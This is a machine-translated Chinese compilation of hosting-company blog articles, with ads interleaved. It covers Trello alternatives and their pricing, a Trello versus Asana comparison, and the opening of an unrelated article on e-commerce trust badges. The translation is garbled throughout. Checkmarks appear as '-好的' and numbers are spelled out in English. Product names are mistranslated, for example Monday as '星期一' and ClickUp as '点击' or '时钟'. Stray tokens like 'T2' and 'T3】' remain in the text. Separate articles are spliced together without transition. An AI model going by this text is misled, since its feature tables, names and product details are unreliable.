功能和定价
| 特征 | 特雷罗 | 看板流 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | X |
| 集成 | 181(溢价) | 通过扎皮尔 |
| 时间跟踪 | X | -好的 |
在许多方面,它是一个缩小的 Trello,但它有任务的时间跟踪(Trello 没有,需要第三方应用程序)。
KanbanFlow Pricing
免费版允许无限的项目,用户和董事会,但有有限的分析和没有集成。高级版起价为每个用户每月 5 美元。
用户体验
基本的板视图体验可与 Trello 相媲美,尽管多彩的设计给人一种更有趣的感觉。
KanbanFlow time tracker
UI 中最有趣的部分是 Pomodoro 时间跟踪器,用户可以用它来跟踪花费在任务上的时间。
集成
它通过 Zapier 支持一些集成,并且有一个 REST API 可用。
KanbanFlow 的用例
- 公司希望有一个无限的和免费的特雷罗替代品。
- 使用番茄工作法的团队。
10. Sortd
Sortd
Sortd 是一个项目管理工具,就在你的 Gmail 收件箱中。
功能和定价
| 特征 | 特雷罗 | Sortd |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | Gmail 和 Google Workspace |
Sortd 提供任务管理和基本的以电子邮件为中心的工作流工具。
Sortd pricing
Sortd 免费提供多达 3 个列表和个人板。Pro 计划的起价是每个用户每月 6 美元。
用户体验
Sortd UI
Sortd 在您的 Gmail 收件箱中为您提供完整的项目管理板功能。
集成
除了与 Gmail 和 Google Workspace 的集成,它没有提供任何集成。
Sortd 的用例
- 仍然大量使用电子邮件与合作伙伴和客户合作的公司。
11.星期一
Monday
周一是一款智能工作流和自动化项目管理工具。
功能和定价
| 特征 | 特雷罗 | Monday.com |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | 30+ |
| 时间跟踪 | X | -好的 |
有了先进的工作流程和时间跟踪,周一的功能更加丰富。
Monday pricing
没有免费计划,而且周一的费用相当昂贵,每个用户每月 39 美元起。
用户体验
周一用户体验中最令人印象深刻的部分是自动化重复任务是多么容易。
Monday workflow tools
集成
Monday.com integrations
Monday.com 有超过 30 个原生集成,包括主要的 SaaS 应用程序,如 Zoom、Slack、Zendesk 和 Salesforce。
周一的用例
- 使用多个平台并希望自动化更多工作流的团队。
12.点击
ClickUp Trello alternative
ClickUp 是一款项目管理软件,旨在为您的所有工作提供一个平台。
点击功能和定价
| 特征 | 特雷罗 | 时钟 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | 181(溢价) | 86(原生)
1000+通过扎皮尔 |
| 时间表和冲刺 | X | -好的 |
ClickUp 提供了多种组织项目的方法;利用 ClickUp 的层次结构,您可以根据需要查看您的项目。通过在列表级别工作,您可以看到单个项目,但是如果缩小到所有级别,您可以在整个工作区中查看您的所有任务!
ClickUp pricing
ClickUp 的免费计划允许无限的成员和任务,但付费计划提供权限控制和无限的存储空间。
厌倦了 WordPress 的问题和缓慢的主机?我们提供世界一流的支持,由 WordPress 专家提供 24/7 服务和超快的服务器。查看我们的计划
用户体验
ClickUp user experience
ClickUp 总共有 15 个视图可供您在工作区中使用;包括用于创建您自己的文档的文档视图,以及允许您在频道中与您的团队交流的聊天视图。
ClickUp 的看板视图也可以让你像 Trello 的看板风格一样查看你的任务。
ClickUp Board view
集成
ClickUp integrations
ClickUp 拥有超过 80 个本机集成,是一个强大的集成工具,允许您链接您的电子邮件收件箱、GitHub 等等。
除此之外,你还可以通过 Zapier、Integrately 或 Integromat 与 ClickUp 建立联系;打开了成千上万个集成的大门。
点击使用案例
- 希望将其整个工作流程集中到一个位置以便进行项目管理和协作的公司。
- 希望简化自己的工作效率并节省自己项目时间的单个用户。
13.管道化
Pipefy
Pipefy 是另一个专注于自动化低效工作流程的项目管理工具。
功能和定价
| 特征 | 特雷罗 | 管道化 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | 7+ |
| SLA | -好的 | -好的 |
Pipefy is one of the cheapest paid Trello alternatives on our list, starting at only $9/user per month.
Pipefy pricing
用户体验
Pipefy UI
Pipefy 用户体验非常直观,默认设置是熟悉的看板视图。您可以轻松地创建、分配和移动管道中的任务。
集成
Pipefy integrations
作为一个相对年轻的新贵,Pipefy 只有几个本地集成,但确实涵盖了 Slack 和 Google Hangouts 。
Pipefy 的使用案例
- 寻求提高工作流程效率的公司。
14.太贺
Taiga
Taiga 是一款面向初创公司和敏捷开发团队的开源项目管理工具,具有非常直观的用户界面。
功能和定价
| 特征 | 特雷罗 | 太贺 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | 6+ |
| 混乱 | X | -好的 |
该软件可通过不同的计划获得,根据用户和基础设施的数量,本地实例的起价高达 3000 美元以上。对于那些对开源解决方案感兴趣的人来说,Taiga 是一个很好的选择。
Taiga pricing
用户体验
除了简单的看板视图,Taiga 还提供了高级的 Scrum 和 sprint 工具,比如这个 Sprint 性能的 backlog 视图。
Taiga sprint backlog
集成
Taiga 与 Slack、 Github 、Gitlab、HipChat、Mattermost 和 DealCloud 进行了本机集成。
泰加的使用案例
- 拥有使用开源解决方案和拥抱敏捷开发的专业知识的公司。
15.雷斯蒂亚
Restya
Restya 是 Trello 和其他项目管理软件的开源替代品。该软件既可以基于云安装,也可以内部安装。
功能和定价
| 特征 | 特雷罗 | 雷斯塔 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | 通过扎皮尔 |
| 混乱 | X | -好的 |
该软件可以免费使用,但它附带了高级软件包,可以提供更多功能,每月起价不到 20 美元。支持以付费方式提供。
用户体验
Restya’s UI
有了 Restya,您可以完全控制看板,从列数、任务到背景音乐(您可能想关闭它)。
集成
通过 Zapier,Restya 可以与 1000 多个应用程序和软件工具集成。不幸的是,其中大多数只能通过他们的加电包(付费)获得。
Restya 的用例
- 拥有使用开源解决方案的专业知识和基础设施的公司。
16. Wekan
Wekan
Wekan 是另一个开源的 Trello 替代品,在麻省理工学院的 T2 许可下发布。
功能和定价
| 特征 | 特雷罗 | Wekan |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | 1? |
Wekan 可以免费使用,也可以托管在你自己的服务器上。
用户体验
Wekan’s UI
Wekan 的 UI 是一个简单明了的任务管理看板。
集成
虽然正在进行更多的集成,但目前 Wekan 仅支持通过 Titra 进行时间跟踪。
Wekan 的使用案例
- 任何需要干净的看板板,相信开源软件,不想用第三方服务的公司。
您的网站内置了 2 个 Trello 备选方案
你想让 Trello 的功能直接内置到你的网站中吗?有了这两个项目管理插件,这正是你能得到的。
17.WordPress 的看板
Kanban for WordPress plugin
您是否正在寻找 Trello 的自托管解决方案,但不了解 Github 库?WordPress 的看板可能是你的选择。
功能和定价
| 特征 | 特雷罗 | WordPress 的看板 |
| 看板视图 | -好的 | -好的 |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | WordPress 和插件 |
| 编辑日历 | -好的 | (就在 WP 内部) |
除了全功能看板,它还提供了编辑日历和销售渠道工具。
KanbanPro Pricing
WordPress 插件的基本看板是 100%免费的,没有用户或使用限制。pro plugin 许可证的固定费用为每年 149 美元,终身许可证为 499 美元。
用户体验
Kanban for WordPress’ UI
该插件在你的网站中构建了一个看板,因为它直接构建在 WordPress 中,你现有的作者和编辑可以很容易地使用它来管理项目。
集成
它集成了几个流行的 WordPress 插件,如 Gravity Forms 。
WordPress 看板的用例
- 想要一个自托管看板工具的所有者。
- 使用 WordPress 作为平台并且需要一个工具来管理编辑内容的出版商和杂志。
18.panorama-WordPress 项目管理插件
Panorama WordPress plugin
Panorama 是 WordPress 的另一个项目管理插件。
Panorama 功能和定价
| 特征 | 特雷罗 | 全景画 |
| 看板视图 | -好的 | X |
| 持卡人 | -好的 | -好的 |
| 最后期限 | -好的 | -好的 |
| 工作流自动化工具 | -好的 | -好的 |
| 集成 | One hundred and eighty-one | WordPress |
Panorama 目前没有看板视图,而是一个独特的项目仪表板。
Panorama pricing
WordPress 插件是免费的,但是如果你想获得全部的功能和支持,你需要至少投资 69 美元的个人许可费。
用户体验
Panorama’s UI
仪表板有点笨重,巨大的饼图和描述将任务列表推到了第一个视图的下方。
集成
它与 WordPress 集成,但不与任何其他协作工具或应用程序集成。
Panorama 的使用案例
- 想要一个自托管项目管理工具的 WordPress 网站所有者。
在我们关于 WordPress 项目管理插件的帖子中,可以看到更多 Trello 的自托管替代方案。
Trello 替代方案(免费与仅付费)
本文涵盖的大多数解决方案都遵循与 Trello 相同的免费增值模式。本质上,这意味着他们提供有限版本的产品,完全免费。
这里有一个简单的总结:
免费特雷罗替代品
- Asana(最多 15 个用户免费)
- 吉拉(最多 10 个用户免费)
- Pipefy(最多 10 个用户免费)
- KanbanFlow(无限用户和项目)
- Sortd(最多 3 个列表)
- Airtable(最多 1200 行或 2 GB 数据)
- Wrike(最多 5 名用户免费)
- WordPress 的看板
- WordPress 全景
- Taiga(开源)
- Restya(开源)
- 开放源代码
仅限付费的 Trello 替代方案
- base camp(99 美元/月,不限用户和项目)
- 微软项目(最低计划 10 美元/用户/月)
- Microsoft Planner(包含在 Office 365 商业计划中)
- Monday.com(提供 14 天免费试用)
- 工作区
最好的特雷罗替代方案是什么?
Trello 的最佳替代方案取决于贵公司的独特情况。
例如,如果您已经在使用 Office 365 Business,并且只是想要一个简单的任务管理和协作工具,Microsoft Planner 可能是您的最佳选择。
另一方面,如果你与各种不同的自由职业者合作,并且不想处理每个人的个人用户许可,支付 Basecamp 的固定费用,或者选择像 KanbanFlow 这样的无限免费选项,可能是你最好的选择。
如果你想要一个更强大的项目管理解决方案,阿萨纳或吉拉可能是最好的选择。
我的观点是:这个列表中所有的特雷罗选择对某些人来说都是最好的选择。你只需要弄清楚哪一个最适合你的情况。
虽然像 Asana 和吉拉这样的市场领导者仍然是 Trello 的可靠替代者,但也有许多新贵给看板解决方案带来了自己的变化。
2022 年,基于云的看板市场远非垄断。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
trello vs Asana——2022 年在哪里管理你的项目
Trello 和 Asana 是目前最流行的两种项目管理工具。那么问题来了:特雷罗 vs 阿萨纳,你该选择哪一个来经营?
下面就随着我们的深入对比一探究竟吧!
特雷罗
Trello
Trello 最初是一个的雾溪软件产品。
据 Trello 的创始人 Joel Spolsky 称,他们在 2011 年 1 月为这款产品编写了第一行代码。
他说,经过三个月的工作,该软件已经足够有用,可以推出了,但他们决定在向公众展示之前再对其进行一些润色。Fog Creek software 于 2011 年 9 月在 Tech Crunch 的 Disrupt 大会上推出了 Trello。
这是一个基于看板生产力系统的创新项目管理产品。
看板系统是由日本工业工程师大野泰一(Taiichi Ohno)开发的,旨在改善丰田的制造流程。
这是如此的成功,以至于这个系统从汽车制造业扩展到了其他行业,如零售、软件,甚至电影。
它也吸引了一些人的注意,他们认为这是提高生产力的一种方式。
下面是最基本的看板看起来像的样子:
Kanban board (Image source: Simpaticodesignstudio.com)
当然,一个大型组织的看板要比这复杂得多,但是你明白了。
Fog Creek Software 开发了一个工具,允许公司创建数字看板。
这是乔尔·斯波尔斯基在他的 Disrupt 演示文稿中使用的一家名为 Artist Exploitation,Inc .的虚构公司的董事会:
Trello’s pitch at Disrupt San Fransisco 2011
现在,你需要记住这是十年前的事了。
当时,在项目管理软件中使用看板是一个革命性的想法,而且创建它是一个严重的技术挑战。
乔尔·斯波尔斯基的演讲很成功:他成功地 “利用 6 分钟的名气吸引 13 万眼球” ,其中 22%的人注册了特雷罗。
Trello capitalizing on media attention
Spolsky 将这一成功归因于他们拥有一款可靠的产品:
“如果我们让 3 个月大的 Trello 上场,那就不会这么棒了。甚至可能是我。我不要 131000 个眼球在 MEH 上。”
从此,Trello 爆发式增长,2015 年达到 1000 万用户。
然而,正如 Hiten Shah 在他的文章 “为什么 Trello 未能建立 10 亿美元以上的业务” 中指出的,他们的竞争对手正在努力工作看板。很快,一个曾经革命性的想法最终变成了老生常谈。
Asana 在 2016 年推出了他们自己的看板功能(更多信息见下文),受到 Trello 的“极大启发”:
“我们完全信任特雷罗。很明显,这款产品很好地开创了这一观点。[……]我们将 Trello 视为一种功能,而不是一种产品。”
Asana 的联合创始人贾斯汀·罗森斯坦说。
反正 Trello 一直在增长,2017 年达到了 2500 万用户。同年,被 Atlassian 以 4.25 亿美元收购。
如今,Trello 拥有超过 3500 万用户,是项目管理领域最受尊敬的公司之一。
关键特征
好吧,那么特雷罗到底给用户提供了什么?
看板系统仍然是 Trello 的核心。它为项目提供了一个很好的视觉进程,因为你可以看到每张卡片随着任务的进展从左向右移动。
A Trello board
正如你所看到的,用户界面与 2011 年时几乎一样,只是现在它在视觉上更有吸引力。
你可以免费邀请尽可能多的人加入你的董事会,如果你和一个大团队一起工作,这很好。
Trello members
您可以通过为每项任务创建白板、列表和卡片来组织您的工作,然后随着任务的进展在列表中移动卡片。
Trello cards
这些卡片不仅仅是数字版的便利贴。你可以给它们添加很多信息,比如任务描述、截止日期、标签、进度清单、附件等等。
顺便说一下,谈到清单和截止日期,Trello 有一个日历功能,可以让你在日历上查看有截止日期的卡片。
Trello 缺乏一个任务依赖系统。但是,您可以使用卡片中的某些元素(如清单和附件)来表示任务相关性。你可以在这里阅读更多关于管理任务相关性的信息。
卡片还有一个评论功能,所以如果你需要讨论一些与任务相关的事情,你可以在卡片里讨论:
Trello comments
这很方便,因为它允许你在一个地方进行交流,而不是分散在几个渠道(电子邮件、即时消息、文本消息等)。).
Trello 还有一个通知系统,通过电子邮件、浏览器和手机向你发送通知,让你随时了解最新情况。
这些通知会在所有设备上同步,这样你就不必为阅读显示为未读的通知而烦恼。如果你收到电子邮件通知,你可以通过电子邮件直接回复。
还有一个强大的搜索功能,可以帮助你快速找到你想要的东西。
如果你想和一群以上的人一起使用 Trello,你可以使用 Trello 团队(这样,你可以有一个家庭团队,一个朋友团队,一个工作团队,等等。).
Trello boards
特雷罗有各种各样的电源。它们允许您在主板上启用附加功能,并将软件与您喜爱的应用程序集成。
例如,一些最受欢迎的开机包括前面提到的日历开机,以及 Google Drive 和 Slack 开机:
Trello power-ups
您可以在此查看所有加电的列表。他们有很多人!
Trello 还提供了各种浏览器扩展,当您经常使用 Trello 时,这些扩展会很方便。例如,使用 PopClip 扩展,您可以将选定的文本保存到 Mac 上的 Trello。你可以在这里看到所有浏览器扩展列表。
此外,值得注意的是,特雷罗非常重视隐私。您可以完全控制谁可以查看您的公告板。另外,他们使用 SSL/HTTPS 连接。
定价
Trello 有三个定价等级:
- 免费。这是最基本的计划。他们承诺它将永远免费。
- 商务舱。这是一个 9.99 美元/用户的月计划。它是为那些需要比免费版本更多功能的中小型企业准备的。
- 企业。这是一个起价为 20.83 美元/用户/月的计划,但价格取决于你需要多少座位(你的团队越大,每个用户的成本越低)。
这三个计划都提供无限的董事会、无限的名单和无限的卡,这使得它成为创业公司的一个伟大工具。
然而,当涉及到更先进的功能,如自动化和电源,免费计划是相当有限的。
此外,免费计划在安全性方面没有提供太多。如果您希望能够设置高级管理权限,发送域限制的邀请或停用成员,您将需要升级到商务级或企业级。
此外,保费计划提供 100 多个集成,使用这些集成可以显著提高您的团队的工作效率。
特雷罗的强项是什么?
特雷罗的主要优势在于其简单性。
这很重要,因为您向团队介绍的每个工具都需要人们投入时间来掌握它。简单性减少了培训新团队成员所需的时间。
此外,特雷罗是令人难以置信的多才多艺。它是为企业设计的,所以可以肯定的是,它们最常见的用例是小型企业的项目管理。
然而,它也可以用来管理你能想到的几乎任何项目,从计划度假到组织聚会到翻新房子。
事实上,在他的“2500 万!庆祝 4 个最受欢迎的 Trello 新功能“”Trello 的联合创始人 Michael Pryor 分享说,团队经常对他们看到的用例感到惊讶。他对用户说:
你开创了我们做梦都想不到的利用特雷罗的方法。从至关重要的销售渠道到度假板,从看板到垃圾桶,从路线图到食谱板:你创造性地使用 Trello 来提高工作和家庭的生产力,继续让我们惊叹。”
这很好,因为你可以使用相同的工具来管理个人和专业项目。
特雷罗最适合谁?
Trello 最适合拥有清晰的线性流程,并且希望团队成员能够快速掌握简单、直观的软件的小型企业。
你需要做的是问问你自己,如果你的整个团队在同一个办公室工作,你是否可以用物理看板来管理你的业务。
大多数小企业主都可以这样做,这意味着他们可能会从使用 Trello 中受益,特别是如果他们正在从事简单的项目。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
然而,如果你的团队太大,你的项目太复杂,那么特雷罗很可能不会削减它。
阿萨纳
Asana
阿萨纳由贾斯汀·罗森斯坦和达斯汀·莫斯科维茨于 2008 年创立。莫斯科维茨是脸书的联合创始人,罗森斯坦是前谷歌和前脸书工程师。
他们都致力于改善项目管理和提高脸书员工的生产力。
这一经历让他们意识到,聪明得令人难以置信的人通常会把大部分时间花在“围绕工作的工作”上,他们指的是电子邮件交流、追踪信息以及确保每个人都在同一页上。
在脸书时,莫斯科维茨和罗森斯坦合作开发了一个名为 Tasks 的内部项目管理工具,该工具很快在公司内部流行起来。他们当时并不这么认为,但他们现在把这个软件视为 Asana 的原型。任务的流行让他们意识到需要这样的产品。
2008 年,他们离开脸书开始练习 Asana。创始人在向公众提供产品之前花了很多时间来开发产品。他们在 2011 年 11 月推出了免费的测试版。正式商业推出是在 2012 年 4 月。
Asana 在推出之前就获得了投资者的关注,这可能至少部分是由于创始人在科技行业的关系。
他们在 2011 年春季首次筹集了 120 万美元的天使轮资金,随后在 2011 年 11 月进行了 900 万美元的首轮融资。值得注意的是,最初的投资者包括彼得·泰尔(后来加入 Asana 的董事会)和肖恩·帕克。
Asana 很快成为一个流行的项目管理工具。但是这个团队并没有固步自封。他们通过倾听客户意见和开发最受欢迎的功能,坚持不懈地改进他们的产品。
结果,在莫斯科维茨和罗森斯坦离开脸书创办 Asana 十年后,该公司达到了 15 亿美元的估值,如今它拥有超过 60,000 名付费用户。此外,公司的创始人对他们的产品如此自信,以至于他们最近宣布所有 500 名 Asana 员工都放弃内部电子邮件。
这意味着人们仍然可以通过电子邮件联系到 Asana 的员工,但不会用于公司内部的交流。莫斯科维茨说:
“对于每个人来说,围绕实际工作组织他们的对话是非常自然的事[…] 大多数时候,当你和同事通过电子邮件交流时,实际上是关于你正在做的一些项目,或者一些行动项目,或者目标。在体式中,这些都被组织在“项目”或“任务”中,每一个都可以有围绕它们的对话线索。所以我们的对话发生在那里。”
这是一个大胆的举动,增加了 Asana 的可信度。毕竟,如果软件对一家 15 亿美元的公司来说足够好,那么它对你的业务来说可能也足够好。
关键特征
Asana 是一个复杂的项目管理工具,允许你处理复杂的项目。
Asana overview
Asana 有一个基于看板系统的板功能,允许你用类似于 Trello 的视觉进度来可视化你的工作。
然而,虽然板是 Trello 产品的核心,但在 Asana 中它只是功能之一(你可能记得,Asana 直到 2016 年才推出它)。
同样值得注意的是,与 Trello 不同,Asana 有一个合适的任务依赖管理系统:
Asana task dependency feature
例如:您可以将一项任务标记为等待另一项任务。然后,一旦第一个任务完成,等待它的人将收到通知,并继续他们自己的任务。
请记住,单个任务可以依赖于多个其他任务,而多个任务可以仅依赖于一个其他任务。
Asana timeline
另一个关键特性是时间线,你可以用它来创建一个计划,显示你的项目的各个部分是如何组合在一起的。这是可视化进度的另一种方式。这有助于你在截止日期前完成工作:
厌倦了体验你的 WordPress 网站的问题?通过 Kinsta 获得最好、最快的主机支持!查看我们的计划
如果有任何变化,您可以轻松地调整时间线,并查看变化如何影响整个项目。顺便说一下,您可以在时间线上绘制任务依赖关系,这使得跟踪复杂项目中正在进行的一切变得更加容易。
还有日历功能,允许您在日历上查看您的工作,使您能够发现日程冲突,例如:
Asana calendar
投资组合功能是一种在一个地方监控你所有计划的简单方法,当你同时处理几个主要项目时,这是很方便的。您还可以实时检查投资组合中的 KPI 和关键信息,以便在任何重大问题发生之前预测它们。
然而,更有趣的是工作负载特性,它使得管理每个团队成员的工作负载变得很容易:
Asana workload
当你管理一个大团队或几个团队时,这是很有价值的。你需要照顾的人越多,就越容易不经意地让某人工作不足或过度劳累。
偶尔出现停工期和紧急时刻是正常的,但长期的工作量管理不善会导致员工不满。这可能会通过降低生产率和员工保留率而使公司损失大量资金。
Asana 还允许您将常见流程转换为模板,这意味着您不必每次都重新发明轮子:
Asana default templates
这一点很重要,因为随着业务的增长,你希望尽可能地简化事情。
您可以通过隐私设置来控制谁可以访问哪些信息,从而确保安全性。
你的团队越大,尤其是如果你使用自由职业者,这个功能就变得越重要,因为你不想让刚进门的人接触到敏感信息。谈到安全性,管理功能允许您控制诸如身份验证和密码强度之类的事情,此外,如果出现安全漏洞,您可以重置所有密码。
Asana integrations
最后, Asana 提供了超过 100 个与其他流行工具的集成,包括 Slack ,Google Drive,Zapier…甚至 Trello!
定价
Asana 有四个定价等级:
- 免费基本计划。它最适合刚刚开始项目管理的个人或团队。
- 保费计划。它最适合想要超越项目管理基础的团队。如果按年计费,费用为 9.99 美元/用户/月,如果按月计费,费用为 11.99 美元/用户/月。
- 商业计划。它最适合需要跨多个项目管理工作的团队和组织。如果按年计费,费用为 19.99 美元/用户/月,如果按月计费,费用为 23.99 美元/用户/月。
- 企业计划。最适合需要额外支持、安全性和控制的组织。如果你想知道价格,你需要联系 Asana 的销售团队。
基本计划非常非常基本。它只包括 Asana 的核心功能,如任务、列表视图、公告板视图、日历视图和截止日期。如果选择此选项,您最多可以与 15 个人合作。
其他计划根据公司的规模与公司的需求相对应:高级计划适用于小型企业,商业计划适用于中型企业,企业计划适用于大型企业。
你可以根据你的团队规模选择一个最适合你公司的计划。
体式的优点是什么?
Asana 的主要优势在于它的复杂性和对项目的精细控制。
您拥有管理一个大型团队或几个团队(处理一个复杂项目或同时处理几个复杂项目)所需的所有功能。
对于需要完成的任务之间的关系不直接的情况,它也是理想的,因为它有助于你看到全局。
体式最适合谁?
体位法最适合大型组织,在那里几个团队同时进行多个复杂的项目。
对于那些必须监督有很多活动部件的项目的经理来说,这尤其有价值。
然而,如果你有一个小团队,这个软件可能有点大材小用。
特雷罗 vs 阿萨纳:顶级差异
特雷罗和阿萨纳的辩论可以归结为简单和复杂。哪个对你更重要?
使用 Trello,您可以获得一个简单、直观、易于使用的软件,并且没有太多的学习曲线。这样做的缺点是,当涉及到真正复杂的项目时,这个工具可能会受到限制。
例如,对于任务间关系复杂的项目来说,缺乏适当的任务依赖系统是一个很大的缺点。
此外,虽然您可以在 Trello 上管理几个简单的项目,但使用该软件同时处理几个复杂的项目可能会很困难。
Trello 的多功能性非常好,因为你可以用它来做任何你能想到的事情(个人待办事项、工作项目、CRM 等等)。).然而,这也意味着它并没有像它应该的那样为业务项目管理进行优化。
另一方面,有了 Asana,你就有了复杂的软件,它有各种各样的功能,让你的生活变得更简单,尤其是当你需要管理复杂的项目和大型团队的时候。
你得到了看板,所以你得到了 Trello 的主要好处,但你也得到所有的附加功能,如时间线、投资组合等。这可以帮助您同时管理多个计划。
任务依赖系统是一个巨大的优势,因为没有它很难管理复杂的项目。当然,这也有一个缺点,所有这些特性意味着你需要花一些时间来熟悉这个软件。
额外的复杂性带来了额外的脆弱性。一个人因为还没有完全弄清楚软件而犯错误,可能会对整个项目产生负面影响。
这也可能发生在 Trello 身上,但可能性要小得多,因为 Trello 要简单得多。
Trello vs Asana:你应该使用哪个项目管理软件?
从财务的角度来看,你会得到更多的帮助。
但是,您还需要考虑学习使用该软件所需的时间投入。
警惕“更多功能,更好产品”的陷阱也很重要。你想要的是以最简单的方式完成工作的软件。如果产品功能足够强大,能够满足您的需求,那么选择功能较少的产品可能是有意义的。
简而言之,对于流程简单的小型企业来说,Trello 可能是更好的选择,而 Asana 则适用于需要额外功能来处理复杂问题的大中型企业。如果你是一家远程公司,这两个工具都是完成工作的完美选择。
最终,这完全取决于你的具体情况。这就是为什么你可能会考虑注册 Asana 和 Trello 的免费计划,并探索产品,看看哪个更能引起你的共鸣。除了这两种,市场上还有很多其他的 Trello 替代品。
摘要
特雷罗 vs 阿萨纳:什么是最好的选择?
市场上的每种工具都有其优点和缺点。没有“完美的”项目管理软件。或者,如果你想从另一个角度看问题,最好的项目管理工具是你能自然使用的跟踪你工作的工具。
也许是特雷罗。可能是 Asana 吧。也许是别的原因。重要的是这对你和你的团队有用。
要做到这一点,你需要了解你的业务的真正需求是什么,然后选择满足它们的软件。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
信任徽章 101:如何建立信任和促进电子商务转换
电子商务企业有取得巨大成功的潜力,但他们有一个问题:潜在客户不愿意从他们不太了解的企业购买产品,无论产品听起来有多棒。
这是可以理解的——35%的美国人至少经历过一次 T2 信用卡诈骗。随着消费者越来越意识到网上购物的风险,他们更倾向于谨慎行事。他们不确定哪些网站可以信任——也许他们只会选择亚马逊和沃尔玛!
这就是信任徽章发挥作用的地方。这是向你的客户表明你的业务是合法的,他们的信息在你这里是安全的。
在本指南中,我们将向您介绍信任徽章的类型,以及您如何使用它们来促进您企业的销售。
T3】
什么是信任徽章?
信任徽章是一个放在网站上的符号,让访问者知道该品牌是合法的和值得信赖的。你也可能听说过它们被称为站点印章或信任印章。
它们对收集个人或支付信息的网站至关重要,比如电子商务或会员网站。潜在客户很容易被那些没有表明其数据安全的粗略网站吓跑。
第三方创造了许多信任徽章。当你达到他们的标准时,他们同意让你在你的网站上使用一个,这可能意味着从购买 SSL 证书到接受对你的业务实践的审查的任何事情。
你知道你的电子商务业务有取得重大成功的潜力📈但是你有一个问题:你的潜在客户很紧张😅在这篇文章中学习如何建立信任&可信度👇 点击推文
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
信任徽章是什么样子的?
信任徽章通常是带有名称和徽标的图标,表示徽章的提供商。
这里有几个例子:
Various SSL trust badges. (Image source: TrustedSite)
你最有可能在主页或任何要求输入信用卡号码或个人信息的页面上看到它们。
有些徽章只是图像。在其他情况下,当您单击徽章时,会显示一个弹出窗口或页面,其中包含有关该网站认证的更多信息:
Example of a trust badge pop-up. (Image source: BurtsBees)
为什么你的网站需要信任徽章
信任徽章有助于说服客户,他们可以信任您的网站,并提供他们的个人和支付信息。
对于电子商务网站来说,放弃购物车是流失转化的一个重要来源。 17%的人放弃购物车是因为他们不信任网站提供的信用卡信息:
Reasons for shopping cart abandonment. (Image source: Baymard)
在结帐过程中的适当位置显示的信任徽章表明他们的数据是安全的。
对于会员制网站,围绕支付的信任问题同样适用。如果您有免费版本或免费试用版,您可能仍然需要确保用户可以在注册时安全地输入他们的个人信息。一个放置得当的信托印章可以做到这一点。
信任徽章有用吗?
一个小图标能影响顾客行为吗?
这听起来可能不太可能,但是我们有证据表明信任徽章是有效的,这要归功于 Baymard Institute 正在进行的检验可用性研究。
研究发现,普通人对网站的信任通常归结于直觉,而不是技术知识。这种直觉很大程度上受到网站视觉安全性的影响。
事实证明,在网站上添加任何视觉图标都会增加用户的安全感。这是真的,即使徽章没有真正的意义——在这项研究中,研究人员创造的通用印章仍然增加了用户的信任。
不过,我们不建议使用任何通用的东西。影响最大的信任徽章来自那些名字可识别的提供商。
网站上的信任徽章放在哪里?
关于 Baymard 的研究,还有一些有趣的事情:他们发现,根据网站的设计,用户认为页面的某些部分比其他部分更安全。
你把信任徽章放在哪里很重要。
你可以把信任徽章放在你网站的任何地方。不过,它可能会在买家质疑网站安全性的地方产生最大的影响,比如收银台或注册页面。让我们探索一些流行的放置选项。
主页
主页上的信任徽章会立即开始建立用户信任。许多公司在主页的折页上方有一个信任徽章,但其他人认为这有损主页设计。
主页上的信任徽章应该是可见的,但很微妙。如果你觉得你的站点印章不适合你的页面设计,你可以在其他地方放置一个。
网站页脚
在页脚放一个信任徽章是在你的网站上传播它的最简单的方法之一。将它添加到你网站的页脚意味着它将出现在每一页,包括主页。
不过,这可能不是你选择的唯一地点。许多客户永远不会看页脚,尤其是当他们考虑是否在结账表单中输入信用卡号时。
你也不希望页脚太多站点印章、社交媒体图标和其他信息。
产品页面
